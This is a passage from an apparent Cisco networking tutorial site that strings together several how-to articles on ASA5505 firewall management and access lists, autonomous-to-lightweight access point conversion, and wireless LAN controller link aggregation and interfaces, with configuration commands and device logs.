WARNING: http server is not yet enabled to allow ASDM access.
ASA5505(config)# http server enable

The above commands enable HTTP management on the ASA Firewall only for the network 10.71.0.0/24.

Enable SSH & Telnet Management For Inside & Outside Interfaces

Enabling SSH and Telnet access to the Cisco Firewall is pretty straightforward. While we always recommend the use of SSH, especially when accessing the Firewall from public IPs, telnet is also an option, however, we must keep in mind that telnet management methods do not provide any security as all data (including username, passwords and configurations) are sent in clear text.

Before enabling SSH, we must generate RSA key pairs for identity certificates. Telnet does not require any such step as it does not provide any encryption or security:

ASA5505(config)# crypto key generate rsa modulus 1024
INFO: The name for the keys will be:
Keypair generation process begin. Please wait...
ASA5505(config)# ssh 10.71.0.0 255.255.255.0 inside
ASA5505(config)# ssh 200.200.90.5 255.255.255.255 outside
ASA5505(config)# telnet 10.71.0.0 255.255.255.0 inside

Note that the ASA Firewall appliance will only accept SSH connections from host 200.200.90.5 arriving on its public interface, while SSH and telnet connections are permitted from network 10.71.0.0/24 on  the inside interface.

Create, Configure & Apply TCP/UDP Object-Groups

An essential part of any firewall configure is to define the Internet services our users will have access to. This is done by either creating a number of lengthy access lists for each protocol/service and then applying them to the appropriate interfaces, or utilising the ASA Firewall Object-Groups which are then applied to the interfaces. Using Object-groups is easy and recommended as they provide a great deal of flexibility and ease of management.

The logic is simple:  Create your Object-Groups, insert the protocols and services required, and then reference them in the firewall access -lists. As a last step, we apply them to the interfaces we need.

Let’s use an example to help visualise the concept. Our needs require us to create two Object-Groups, one for TCP and one for UDP services:

ASA5505(config)#object-group service Internet-udp udp
ASA5505(config-service)# description UDP Standard Internet Services
ASA5505(config-service)# port-object eq domain
ASA5505(config-service)# port-object eq ntp
ASA5505(config-service)# port-object eq isakmp
ASA5505(config-service)# port-object eq 4500
!
ASA5505(config-service)#object-group service Internet-tcp tcp
ASA5505(config-service)# description TCP Standard Internet Services
ASA5505(config-service)# port-object eq www
ASA5505(config-service)# port-object eq https
ASA5505(config-service)# port-object eq smtp
ASA5505(config-service)# port-object eq 465
ASA5505(config-service)# port-object eq pop3
ASA5505(config-service)# port-object eq 995
ASA5505(config-service)# port-object eq ftp
ASA5505(config-service)# port-object eq ftp-data
ASA5505(config-service)# port-object eq domain
ASA5505(config-service)# port-object eq ssh
ASA5505(config-service)# port-object eq telnet

Now we need to reference our two Object-groups using the firewall access lists. Here we can also define which networks will have access to the services listed in each Object-group:

ASA5505(config)# access-list inside-in remark -=[Access Lists For Outgoing Packets from Inside interface]=-
ASA5505(config)# access-list inside-in extended permit udp 10.71.0.0 255.255.255.0 any object-group Internet-udp
ASA5505(config)# access-list inside-in extended permit tcp 10.71.0.0 255.255.255.0 any object-group Internet-tcp
ASA5505(config)# access-list inside-in extended permit tcp 10.75.0.0 255.255.255.0 any object-group Internet-tcp
ASA5505(config)# access-list inside-in extended permit tcp 10.76.0.0 255.255.255.0 any object-group Internet-tcp

Note that the 10.71.0.0/25 network has access to both Object-groups services, our other networks are restricted to only the services defined in the TCP Object-group. To understand how Object-groups help simplify access list management: without them, we would require 37 access lists commands instead of just 4!

Configuration Of Access-Lists For ICMP Packets To The Internet

To complete our access list configuration we configure our ASA Firewall to allow ICMP echo packets (ping) to any destination, and their replies (echo-reply):

ASA5505(config)# access-list inside-in extended permit icmp 10.71.0.0 255.255.255.0 any
ASA5505(config)# access-list outside-in remark -=[Access Lists For Incoming Packets on OUTSIDE interface]=-
ASA5505(config)# access-list outside-in extended permit icmp any any echo-reply

Appling Firewall Access-Lists To ‘inside’ & ‘outside’ Interfaces

The last step in configuring our firewall rules involves applying the two access lists, inside-in & outside-in, to the appropriate interfaces. Once this step is complete the firewall rules are in effect immediately:

ASA5505(config)# access-group inside-in in interface inside
ASA5505(config)# access-group outside-in in interface outside

Configure Logging/Debugging Of Events & Errors

This last step in our ASA Firewall configuration guide will enable logging and debugging so that we can easily trace events and errors. It is highly recommended to enable logging because it will certainly help troubleshooting the ASA Firewall when problems occur.

ASA5505(config)# logging buffered 7
ASA5505(config)# logging buffer-size 30000
ASA5505(config)# logging enable

The commands used above enable log in the debugging level (7) and sets the buffer size in RAM to 30,000 bytes (~30Kbytes).

Issuing the show log command will reveal a number of important logs including any packets that are processed or denied due to access-lists:

ASA5505(config)# show log
Syslog logging: enabled
    Facility: 20
    Timestamp logging: disabled
    Standby logging: disabled
    Debug-trace logging: disabled
    Console logging: disabled
    Monitor logging: disabled
    Buffer logging: level debugging, 39925 messages logged
    Trap logging: disabled
    History logging: disabled
    Device ID: disabled
    Mail logging: disabled
    ASDM logging: disabled
n" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54843 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54845 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54844 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54850 dst outside:10.0.0.10/139 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54843 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54845 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54844 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54850 dst outside:10.0.0.10/139 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny udp src inside:10.71.0.50/137 dst outside:10.0.0.10/137 by access-group "inside-in" [0x0, 0x0]
%ASA-6-302014: Teardown TCP connection 4718 for outside:173.194.40.49/443 to inside:10.71.0.50/54803 duration 0:02:00 bytes 1554462 TCP FINs

Summary

This article serves as an introduction configuration guide for the Cisco ASA5500 series Firewall appliances. We covered all necessary commands required to get any ASA5500 Firewall working and servicing network clients, while also explaining in detail all commands used during the configuration process.



  • Hits: 219772
Cisco WLC 9800-CL Download and Deployment Models

Complete Guide: How to Download & Deploy The Cisco 9800-CL Virtual Wireless Controller on VMware ESXi

Introduction to Cisco 9800-CL Cloud-based wireless controllerThis article covers the deployment of the Cisco WLC 9800-CL cloud-based controller on the VMware ESXi platform. We explain the CPU, RAM and storage requirements, provide URLs to easily download and install the WLC controller using the OVA template, select the appropriate WLC 9800 deployment size (small, medium, large) and help you understand and configure the different WLC VM network interfaces.

Key Topics:

Introduction to the Cisco 9800 WLC Virtual Controller

Cisco released their next-generation 9800 series Wireless Controllers back in 2018, also offering a cloud-based version that supports VMware ESXi, Microsoft Hyper-V, Amazon AWS, Microsoft Azure, Google Cloud Platform (GCP), Ubuntu/Red Hat Enterprise Linux using KVM, and Cisco NFVIS environments.

The virtualized version of the WLC controller offers great flexibility for organizations while at the same time provides considerable savings thanks to its zero-price tag. Customers are able to freely download and deploy the appliance, with the only restriction being the AP licenses that need to be purchased as an ongoing subscription.

Virtualization offers additional benefits which include:

  • Hardware independence. Not hardware involved. Lead times for the hardware-based controllers can sometimes exceed 6-9 months depending on the market demand and other circumstances.
  • Decreased cost. The VM option means organizations are saving 6-figure amounts for every 9800-40 or greater model they require. If you’re considering introducing High-Availability (HA), then the Cloud-based controller becomes a much cheaper architecture. Additional savings are added since Smartnet contracts for the hardware are not required.
  • Better utilization of virtualization infrastructure. Utilizing the existing virtualization platform increases its ROI.
  • Greater Deployment Flexibility. VMs allow you to easily move them from one physical server to another, even between different datacenters or physical locations.
  • Increased Redundancy & Backups. Backing up a VM is an easy and simple process. You can even use specialized free VM Backup tools for this process.

Cisco 9800 WLC Virtual Controller VMware ESXi Requirements

Deploying the WLC 9800-CL in an ESXi environment is, as you’ll discover, a simple process. Cisco provides a single OVA file package, roughly around 1.25GB in size:

Cisco WLC, WLC, Wireless Lan Controller, ESXi, VMware ESXi, Deployment, Download

Continue reading

  • Hits: 3455

Easily Convert Cisco Autonomous - Standalone AP to Lightweight Mode & Register it to a Cisco WLC Controller

cisco wireless controller ap conversionThis article explains how to convert a local or remote Autonomous / Standalone Cisco Aironet Access Point to Lightweight and register it to a Cisco WLC Controller. Included are detailed steps, commands, full text logs of the conversion process and screenshots to ensure an easy and successful upgrade - WLC registration.

Key Topics:

Related Articles

Restrictions & Considerations when Converting Autonomous APs to Lightweight Mode

Converting an Autonomous AP to Lightweight Mode is a straight forward process however it is important to keep a few things in mind before performing the conversion procedure as there are some restrictions users should be aware of.

Depending on the level of experience some of these notes/restrictions might be considered basic or redundant knowledge. For sake of simplicity we are presenting them in bullet format:

  • All Cisco lightweight access points are capable of supporting up to 16 BSSIDs per radio and a total of 16 WLANs per access point.
  • Access points converted to lightweight mode require a DHCP server to obtain an IP address and discover the WLC via DNS or IP broadcast.
  • Lightweight access points do not support Wireless Domain Services (WDS). All lightweight APs communicate with the WLC.
  • Lightweight AP console port provides read-only access to the AP.

The Different Type of Access Point Image Files (k9w8 & rcvk9w8)

Before we begin the conversion process it is necessary to download the CAPWAP software file that matches the Access Point to be converted. These files can be downloaded from Cisco’s website and usually require an active Smartnet contract. Alternatively, a search on the web might reveal other sources from which they can be downloaded.

There are two type of AP CAPWAP software files we can download and install:

  • Fully functional CAPWAP Image file (full image) – Identified by the k9w8 string in their filename and are usually large in size (10-20Mb). Once loaded, the AP is able to join the WLC and download its configuration. Example file name: ap3g1-k9w8-tar.152-4.JB6.tar
  • Recovery mode CAPWAP Image file – Identified by the rcvk9w8 string in their filename. These are smaller in size (5-8Mb) and used to help the AP boot and join the controller so it can then download the full image from the WLC. Example filename: ap3g1-rcvk9w8-tar.152-4.JB6.tar

Regardless of the type of image loaded during the conversion process, the AP will always download the full image from the WLC as soon as it joins. The only exception to this rule is when the fully functional CAPWAP image file loaded on the AP is the same version as the one contained in the WLC.

Cisco AP Autonomous to Lightweight Conversion Process

First download a fully functional or recovery mode CAPWAP file suitable for the AP model. In our example we will be converting a Cisco 3502 AP and decided to download the appropriate recovery mode file: ap3g1-rcvk9w8-tar.152-4.JB6.tar.

Since the AP will automatically download the full image from the WLC once it joins, using the recovery mode file will speed up the conversion process.

We’ll need to have a FTP server running so we can configure the AP to download the file from it.

STEP 1: Power up the Autonomous AP & Configure a FTP server form where the AP will download the image

STEP 2: Connect the Autonomous AP to a network switch or directly to the workstation serving the AP image via a FTP server.

STEP 3: Configure the AP with an IP address appropriate for the network or set it to DHCP

In our example we configure the AP to obtain its IP address from a DHCP server:

ap(config)# interface bvi1
ap(config-if)# ip address dhcp
*Mar  1 00:27:53.248: %DHCP-6-ADDRESS_ASSIGN: Interface BVI1 assigned DHCP address 192.168.2.83, mask 255.255.255.0, hostname ap

The AP confirms once it has successfully obtained an IP address from the DHCP server.

Note: BVI interface indicates that the Radio interface (e.g Dot11Radio0) and Ethernet interface (e.g GigabitEthernet0) are bridged (bridge-group x). If this is not your case, apply the configuration to the AP’s Ethernet interface.

STEP 4: Configure the AP with the FTP user account credentials as configured on the FTP server. This will allow the AP to access and download the image file. Once configured, begin the software download procedure using the archive download-sw command.

cisco autonomous ap to lightweight conversion

Here is the complete text log of the procedure:

ap# configure terminal
ap(config)# ip ftp username admin
ap(config)# ip ftp password cisco1234
ap(config)# exit
ap# archive download-sw /force-reload /overwrite ftp://192.168.2.61/ap3g1-rcvk9w8-tar.152-4.JB6.tar
Mar  1 00:30:46.348: %SYS-5-CONFIG_I: Configured from console
Mar  1 00:30:50.563: Loading ap3g1-rcvk9w8-tar.152-4.JB6.tar
extracting info (264 bytes)!
Image info:
    Version Suffix: rcvk9w8-
    Image Name: ap3g1-rcvk9w8-mx
    Version Directory: ap3g1-rcvk9w8-mx
    Ios Image Size: 123392
    Total Image Size: 7936512
    Image Feature: WIRELESS LAN|LWAPP
    Image Family: AP3G1
    Wireless Switch Management Version: 7.6.100.0
MwarVersion:07066400.First AP Supported Version:07000000.
Image version check passed 
*Mar  1 00:30:46.348: Loading ap3g1-rcvk9w8-tar.152-4.JB6.tar
Extracting files...
ap3g1-rcvk9w8-mx/ (directory) 0 (bytes)
extracting ap3g1-rcvk9w8-mx/ap3g1-rcvk9w8-mx (121199 bytes)
extracting ap3g1-rcvk9w8-mx/ap3g1-boot-m_upg (393216 bytes)!!
extracting ap3g1-rcvk9w8-mx/u-boot.bin (393216 bytes)!
extracting ap3g1-rcvk9w8-mx/ap3g1-rcvk9w8-xx (7016987 bytes)!!!!!!!!!!!!!!!!!!!!!!!!!!!
extracting ap3g1-rcvk9w8-mx/info (264 bytes)
extracting ap3g1-rcvk9w8-mx/file_hashes (712 bytes)
extracting ap3g1-rcvk9w8-mx/final_hash (141 bytes)
extracting ap3g1-rcvk9w8-mx/img_sign_rel.cert (1375 bytes)
extracting ap3g1-rcvk9w8-mx/img_sign_rel_sha2.cert (1371 bytes)!
extracting info.ver (264 bytes)
[OK - 7946240/4096 bytes]
Deleting target version: flash:/ap3g1-rcvk9w8-mx...done.
Deleting current version: flash:/ap3g1-k9w7-mx.153-3.JF5...
Set booting path to recovery image: ''...done.
New software image installed in
Writing out the event log to flash:/event.log ...
flash:/ap3g1-rcvk9w8-mx
Configuring system to use new image...done.
Requested system reload in progress...
archive download: takes 221 seconds
*Mar  1 00:34:31.088: %DOT11-5-EXPECTED_RADIO_RESET: Restarting Radio interface Dot11Radio0 due to IOS reload
*Mar  1 00:34:31.088: %DOT11-5-EXPECTED_RADIO_RESET: Restarting Radio interface Dot11Radio1 due to IOS reload
*Mar  1 00:34:31.094: %SYS-5-RELOAD: Reload requested by Exec. Reload Reason: Reason unspecified.

The /force-reload parameter will automatically reload the AP as soon as the new software image is installed while the /overwrite parameter is required to replace the autonomous image with the CAPWAP image.

Console cable can be used for the conversion process of local APs. Alternatively SSH/Telnet can be used for the conversion of both local and remote APs.

Registering Cisco Lightweight AP to WLC Controller

Once the CAPWAP image has been successfully loaded on the AP it reload and begin searching to register with a WLC Controller. As soon as the AP successfully registers with the WLC it will compare its image with that of the controller and if found different begin to download and install it.

It is important to ensure there is an active DHCP server on the same VLAN/network as the AP to provide it with an IP address, subnetmask, gateway and DNS parameters. DNS parameters are not mandatory but will speed up the WLC discovery processes if the DNS server contains an “A Typeresource record  of “CISCO-CAPWAP-CONTROLLER” pointing to the WLC’s IP address.

In the logs below we can see our AP searching for the WLC (Translating "CISCO-CAPWAP-CONTROLLER"...domain server) after its initial reload (we’ve just installed recovery mode image). It then discovers the WLC (both WLC and AP are on the same VLAN), registers and downloads the WLC full CAPWAP image:

cisco autonomous ap to lightweight conversion - firmware download

Click to enlarge

 

Mar  1 00:00:41.806: %CDP_PD-2-POWER_LOW: All radios disabled - NEGOTIATED WS-C3560CX-12PC-S (0076.8697.b603)
*Mar  1 00:00:46.122: %DHCP-6-ADDRESS_ASSIGN: Interface BVI1 assigned DHCP address 192.168.50.12, mask 255.255.255.0, hostname APe05f.b9a7.e290
Translating "CISCO-CAPWAP-CONTROLLER"...domain server (8.8.8.8)
*Mar  1 00:00:57.113: %CAPWAP-3-ERRORLOG: Did not get log server settings from DHCP. (8.8.4.4)
*Mar  1 00:01:15.119: %CAPWAP-3-ERRORLOG: Could Not resolve CISCO-CAPWAP-CONTROLLER
*Mar  1 00:01:25.120: %CAPWAP-3-ERRORLOG: Go join a capwap controller
*Sep  6 09:54:05.000: %CAPWAP-5-DTLSREQSEND: DTLS connection request sent peer_ip: 192.168.50.5 peer_port: 5246
examining image...
extracting info (287 bytes)
Image info:
    Version Suffix: k9w8-.153-3.JD4
    Image Name: ap3g1-k9w8-mx.153-3.JD4
    Version Directory: ap3g1-k9w8-mx.153-3.JD4
    Ios Image Size: 9042432
    Total Image Size: 10138112
    Image Feature: WIRELESS LAN|LWAPP
    Image Family: AP3G1
    Wireless Switch Management Version: 8.3.112.0
Extracting files...
ap3g1-k9w8-mx.153-3.JD4/ (directory) 0 (bytes)
extracting ap3g1-k9w8-mx.153-3.JD4/u-boot.bin (393216 bytes)
*Sep  6 09:54:07.258: %CAPWAP-5-DTLSREQSUCC: DTLS connection created successfully peer_ip: 192.168.50.5 peer_port: 5246
<output omitted>

The following screenshot was taken after the AP joined the WLC and begun automatically downloading the new image:

As soon as the AP downloads and installs the new image, it will automatically reload and register with the WLC again. At this point the AP is ready to be configured and used as required.

Finally notice the date/time correction (*Sep  6 09:54:05.000) as soon as the AP registers with the WLC controller. This is the first indication its registered correctly with the WLC at IP address 192.168.50.5

Summary

This article showed how to convert an Autonomous or Standalone Cisco Access Point to Lightweight mode and join it to a Cisco WLC Controller. We covered the different restrictions and considerations during the AP conversion process, explained the difference between the fully functional CAPWAP (k9w8) and recovery mode CAPWAP (rcvk9w8) image files. Finally we provided the necessary commands & tips to configure the AP, transfer the image and register it with the WLC.

 

  • Hits: 57868

Configuring Cisco WLC Link Aggregation (LAG) with Port-Channel EtherChannel. LAG Restrictions for WLC Models

Cisco Wireless Controllers (WLC) support the configuration of Link Aggregation (IEEE 802.3ad - LAG) which bundles the controller ports into a single port channel. This helps simplify the configuration of the WLC interface ports, increase available bandwidth between the wireless and wired network, provide load-balancing capabilities between physical WLC ports and increase port redundancy.

To learn more about WLC interfaces refer to our article Cisco WLC Interfaces, Ports & Their Functionality article

The diagram below shows an example of a WLC 2504 with ports P1 and P2 in a LAG configuration connecting to a Cisco Catalyst or Nexus switch. In the configuration below WLC ports P1 and P2 are aggregated to provide a total of 2Gbps bandwidth:

WLC LAG Configuration with Cisco Nexus and Catalyst Switch

Key Topics:

Related Articles

Link Aggregation Restrictions - Considerations

While LAG is the preferred method of connecting the WLC to the network there however a number of restrictions we need to be aware of to ensure we don’t stumble into any unpleasant surprises.

  • On 2504 and 3504 WLCs you can bundle all 4 ports into a single link.
  • On 5508 WLC you can bundle up to 8 ports into a single link.
  • Link Aggregation Control Protocol (LACP) or Cisco proprietary Port Aggregation Protocol (PAgP) are not supported by the WLC. Port-Channel members must be set unconditionally to LAG (shown in the configuration below).
  • Only one LAG Group is supported per WLC, you can therefore connect a WLC only to one switch unless using VSS (Catalyst) or vPC (Nexus) technologies.
  • When LAG is enabled, if a single link fails, traffic is automatically switched to the other links.
  • After enabling LAG the WLC must be rebooted.
  • When enabling LAG, all dynamic AP manager interfaces and untagged interfaces will be deleted. (See related article WLC Interfaces – Logical Interfaces)
  • After enabling LAG, all Virtual Interfaces use the LAG interface. No backup port (under the Virtual Interface settings) is configurable:

wlc virtual interfaces with and without lag port channelClick to enlarge

Wireless Controller LAG Configuration – Enabling LAG

First step is to enable LAG. Log into the WLC and click on the Advanced menu option (firmware v8 and above only). Next, select the Controller menu option and set the LAG Mode on next reboot option to Enabled and click on the Apply button:

How to enable LAG on Cisco WLC

At this point the WLC will pop up a warning window explaining the changes that are about to take place. As mentioned previously, all dynamic AP manager interfaces and untagged interfaces will be deleted. (See related article WLC Interfaces – Logical Interfaces to understand the implications):

WLC Configuration to enable LAG Support

Once we click on OK the WLC will proceed to enable LAG mode and present us with another notification requesting that we save the configuration and reboot the controller:

WLC LAG Mode Confirmation

Note: Ignore the DNS Server IP that was presented in our Lab environment.

Next, click on the Save Configuration button on the top right corner. To reboot the controller, click on Commands menu, select Reboot from the right menu column and finally click on the Reboot button on the right:

wlc 2504 reboot process

Click on OK in the popup message to confirm the reboot.

At this point the WLC will reboot and we won’t be able to ping or access the WLC web interface until we configure the switch. All access points and wireless networks will also be unavailable.

Configuring Switch Port-Channel to Support Link Aggregation

The Port-channel configuration is a straight forward process. It’s best to ensure all interfaces participating in the Port-channel are set to their default configuration. This will remove any existing configuration, minimizing errors during the switchport configuration process.

First remove existing configuration from the interfaces participating in the Port-channel (Gigabitethernet 0/6 & 0/7), then make them members of Port-channel 1. If the Port-channel doesn’t exist, it will be automatically created:

3560cx-HQ(config)# default interface range Gigabitethernet 0/6-7
3560cx-HQ(config)# interface range GigabitEthernet 0/6-7
3560cx-HQ(config-if-range)# channel-group 1 mode on

Creating a port-channel interface Port-channel 1
3560cx-HQ(config-if-range)# description WLC2504
3560cx-HQ(config-if-range)# switchport mode trunk
3560cx-HQ(config-if-range)# switchport trunk allowed vlan 2,15,16,22,26
3560cx-HQ(config-if-range)# no shutdown

Below is the complete Port-channel and interface configuration:

!
interface Port-channel1
description WLC2504
switchport trunk allowed vlan 2,15,16,22,26
switchport mode trunk
!
interface GigabitEthernet0/6
switchport trunk allowed vlan 2,15,16,22,26
switchport mode trunk
channel-group 1 mode on
!
interface GigabitEthernet0/7
switchport trunk allowed vlan 2,15,16,22,26
switchport mode trunk
channel-group 1 mode on
!

Notice that the channel-group mode is set to on which enables Etherchannel without any LACP or PAgP support. This is because the WLC doesn’t support LACP or PAgP and requires a plain vanilla Etherchannel.

When connecting the WLC to a modular Catalyst or Nexus switch its always advisable to use ports on different modules as this will increase redundancy in the event of a module failure.

Finally during the Port-channel configuration process, ensure to allow all necessary VLANs used by the WLC controller and wireless network.

Once the configuration is complete, we’ll should be able to ping and access the WLC again.

A simple show interface port-channel 1 will also confirm both configured links are up and we have a total bandwidth of 2Gbps:

3560cx-HQ# show interface port-channel 1

Port-channel1 is up, line protocol is up (connected)
Hardware is EtherChannel, address is 0076.8697.b607 (bia 0076.8697.b607)
Description: WLC2504
MTU 1500 bytes, BW 2000000 Kbit/sec, DLY 10 usec,
reliability 255/255, txload 1/255, rxload 1/255
Encapsulation ARPA, loopback not set
Keepalive set (10 sec)
Full-duplex, 1000Mb/s, link type is auto, media type is unknown
input flow-control is off, output flow-control is unsupported
Members in this channel: Gi0/6 Gi0/7
ARP type: ARPA, ARP Timeout 04:00:00

<output ommited>

Additional useful commands that can be used to obtain more information on the Etherchannel are:

  • Show etherchannel 1 summary
  • Show etherchannel 1 status
  • Show etherchannel 1 port-channel
  • Show etherchannel 1 protocol

Summary

This article explained the advantages and showed how to configure Link Aggregation (LAG) on your Cisco WLC. We included a number of important LAG restrictions for WLCs while noting restrictions for specific WLC models (2504, 5508 etc). Cisco switch port configuration using Port-channel interfaces was also included along side with an explanation on why Etherchannel must be used as WLC LAG does not support LACP or PAgP. Finally we included a number of useful commands to verify and troubleshoot Link Aggregation or Port-channel interfaces.

  • Hits: 69668

Cisco WLC Interfaces, Ports & Their Functionality. Understand How WLCs Work, Connect to the Network Infrastructure & Wi-Fi SSID/VLAN mappings

Our previous article introduced Cisco’s popular Wireless ControllerCisco’s popular Wireless Controller (WLC) devices and examined their benefits to enterprise networks, different models offered and finally took a look at their friendly GUI interfaces. This article continues by explaining the purpose and functionality of each WLC interface (Management interface, Virtual interface, AP-Manager interface, Dynamic interfaces etc), WLC Port (Service port, Redundant port, Distribution ports etc), how WLCs connect to the network infrastructure, VLAN requirements and mapping to SSIDs.

Users can freely download Cisco's WLC product portfolio in our Cisco's Wireless Controller Datasheets download section. The datasheets contain all currently available WLC models, brief specification overview/comparison and much more.

WLC Interface Concepts – Understanding Ports & Logical Interfaces

Every WLC is fitted with a number of ports (physical interfaces) and logical interfaces, all critical for the device’s proper operation and integration with the network infrastructure. It is important that engineers working with WLCs, understand the purpose of each interface and how it should be used. This will help maximize the stability and scalability of any WLC deployment by correctly configuring all necessary interfaces and attached devices.

WLC Ports (Physical Interfaces)

We will now take a look at the different ports that can be found on WLCs and explain their purpose. Depending on the WLC model, some ports might or might not be present. The Console Port and Distribution System Ports are found on all WLCs.

cisco-wireless-controllers-interfaces-ports-functionality-1Figure 1. Available Ports on a Cisco WLC 5500

Redundancy Port

This port is used for High-Availability (HA) deployment designs when there are two WLCs available. In this setup, both WLCs are physically connected with each other through the Redundant Port using an Ethernet cable. The redundancy port is used for configuration, operational data synchronization and role negotiation between the primary and secondary controllers.

The redundancy port checks for peer reachability by sending UDP keepalive messages every 100 milliseconds from the standby-hot WLC to the active WLC. Finally, the first two octets of the redundancy port’s IP address is always 169.254.xxx.xxx.

Service Port

The service port is used for out-of-band management of the controller and system recovery and maintenance in the event of a network failure. It is important to note that the service port does not support VLAN trunking or VLAN tagging and is therefore required to connect to an access port on the switch.

It is also recommended not to connect the service port to the same VLAN as the wired clients network because by doing so, administrators will not be able to access the management interface (analysed later) of the controller.

SFP/Ethernet Distribution System Ports

The distribution system ports are the most important ports on the WLC as they connect the internal logical interfaces (analysed below) and wireless client traffic to the rest of our network. High-end WLCs as the WLC 5500 series above, have multiple SFP-based distribution system ports allowing engineers to connect the WLC with the network backbone using different configurations. The SFP Ports are able to accept fiber optic or Ethernet copper interfaces, with the use of the appropriate SFPs.

cisco-wireless-controllers-interfaces-ports-functionality-2bFigure 2. Picture of Fiber & Ethernet Copper SFPs

Lower-end WLCs such as the WLC2504 or the older WLC2100 series provide Ethernet interfaces only, because of the limited number of access points supported. For example, the WLC2504 provides up to 4 Gigabit Ethernet ports and can support up to 75 access points, while the WLC2125 provides up to 8 FastEthernet ports and supports up to 25 access points.

 cisco-wireless-controllers-interfaces-ports-functionality-3Figure 3. Pictures of WLC2504 & WLC2124

WLC Interfaces (logical Interfaces)

In this section, we will examine the logical interfaces that can be found on all WLCs. Understanding the functionality of each logical interface is crucial for the correct setup and deployment of any Cisco WLC-based wireless network.

The WLC’s logical interfaces are used to help manage the Wireless SSIDs broadcasted by the access points, manage the controller, access point and user data, plus more.

The diagram below provides and visual layout of the logical interfaces and how they connect to the physical ports of a WLC:

Figure 4. Cisco Wireless Controller Interfaces & Ports (click to enlarge)

The above layout shows how each Wireless SSID (WLAN 1, WLAN 2 etc), maps to a Dynamic interface. In turn, each Dynamic interface maps to a specific VLAN. The number of WLANs & Dynamic interfaces depend on the WLC model. The bigger the WLC model, the more SSIDs (Wireless Networks)/Dynamic interfaces it supports.

All Dynamic interfaces and AP-Manager/Manager interfaces connect to the network infrastructure via the Distribution ports which depending on the WLC model are SFP or Ethernet (10/100 or Gigabit) interfaces.

Because all WLCs have multiple physical Distribution ports, it is possible to assign all Dynamic interfaces and AP-Manager/Manager interfaces to one physical Distribution port, as shown in the above diagram. In this case, the Distribution port is configured as an 802.1q Trunk port. Alternatively, Dynamic interfaces can also be assigned to separate physical Distribution ports, so that a specific WLAN/Dynamic interface can tunnel its traffic through a single Distribution port.

The dedicated Service-Port seen in the above diagram can be found only on the WLC 5500 series and 7500/8500 series which connects directly to the network.

Let’s take a closer look at each logical interface and explain its purpose:

Management Interface

The management interface is the default interface used to access and manage the WLC. The management interface is also used by the access points to communicate with the WLC. The management interface IP address is the only ping-able IP address and is used by administrators to manage the WLC.

Administrators can log into the WLC’s configuration GUI by entering the management interface IP address in a web browser and logging into the system.

AP-Manager Interface

A controller can have one of more AP-Manager interfaces which are used for all Layer 3 communications between the controller and lightweight access points after they have joined the controller. The AP-Manager IP address is used as the tunnel source for CAPWAP/LWAPP packets from the controller to the access points, and as the destination IP address for CAPWAP/ LWAPP packets from the access points to the controller.

While the configuration and usage of the AP-Manager interfaces is optional, models such as the WLC2504 and WLC5508, do not have a dedicated AP-Manager interface. For these models, under the Management interface settings, there is an option labeled Enable Dynamic AP Management, that allows the Management interface to work as an AP-Manager interface at the same time:

cisco-wireless-controllers-interfaces-ports-functionality-5Figure 5. Cisco WL2504 - Management interface, Dynamic AP Management option (click to enlarge)

According to Cisco's documentation, each AP-Manager interface can handle up to 48 access points, however we belieive with the latest firmware updates that this limit has been increased to 75, because the smaller WLC model (2504) can now handle up to 75 access points with its dual-purpose management/AP-Manager interface. If more access points are installed, then multiple AP-Manager interfaces are required to be configured.

Virtual Interface

The virtual interface is used to manage and support wireless clients by providing DHCP relay functionality, guest web authentication, VPN termination and other services. The virtual interface plays the following two primary roles:

  • Acts as the DHCP server placeholder for wireless clients that obtain their IP address from a DHCP server.
  • Serves as the redirect address for the web authentication login page (if configured).

The virtual interface IP address is only used for communications between the controller and wireless clients. It never appears as the source or destination address of a packet that goes out through the distribution ports and on to the local network.

Finally, the IP address of the virtual interface must be unique on the network. For this reason, a common IP address used for the virtual interface is 1.1.1.1. All controllers within a mobility group must be configured with the same virtual interface IP address to ensure inter-controller roaming works correctly without connectivity loss.

Service-Port Interface

The service-port interface is used for out-of-band management of the controller. If the management workstation is in a remote subnet, it may be necessary to add a IPv4 route on the controller in order to manage the controller from the remote workstation.

It is important to note that the service-port IP address must not reside on the same subnet as the Manager/AP-Manager interface.

Smaller WLC models such as the WLC2124, WLC2504 do not have a service-port interface.

Dynamic Interface

The easiest way to explain dynamic interfaces is to think of them as VLAN interfaces for your wireless networks (SSIDs). One dynamic interface is created per wireless network/SSID. The wireless network or SSID is mapped to a dynamic interface, which is then mapped to a specific VLAN network.

As mentioned earlier, dynamic interfaces can be assigned to separate physical distribution ports, so that traffic from specific WLANs, pass to the wired network via specific distribution ports. In this scenario, each distribution port is a single access-link carrying one VLAN only.

Alternatively, all dynamic interfaces can be mapped to one distribution port, in which case will be a trunk port so that it can carry all WLANs/VLANs. This is a common setup method for smaller networks.

Finally, each dynamic interface must be on a different VLAN or IP subnet from all other interfaces.

Since the WLC2504 controller can handle up to 16 SSIDs, it can have a maximum of 16 dynamic interfaces, and support a maximum of 16 VLANs.

Distribution Port - Link Aggregation

All WLCs support the aggregation of multiple distribution ports into a single port using the 802.3ad port standard. This allows an administrator to create one large link between the WLC and the local switch.

For example, the WLC2504 provides 4 Gigabit Ethernet ports, allowing us to aggregate all 4 ports with the neighbour switch and create a 4 Gigabit Ethernet link with the wired network. EtherChannel will have to be configured on the local switch for the link aggregation to work.

WLCs do not support Link Aggregation Control Protocol (LACP) or Cisco’s proprietary Port Aggregation Protocol (PAgP), and therefore the switch must be set unconditionally to LAG. Only one LAG group is supported per controller.

Conclusion

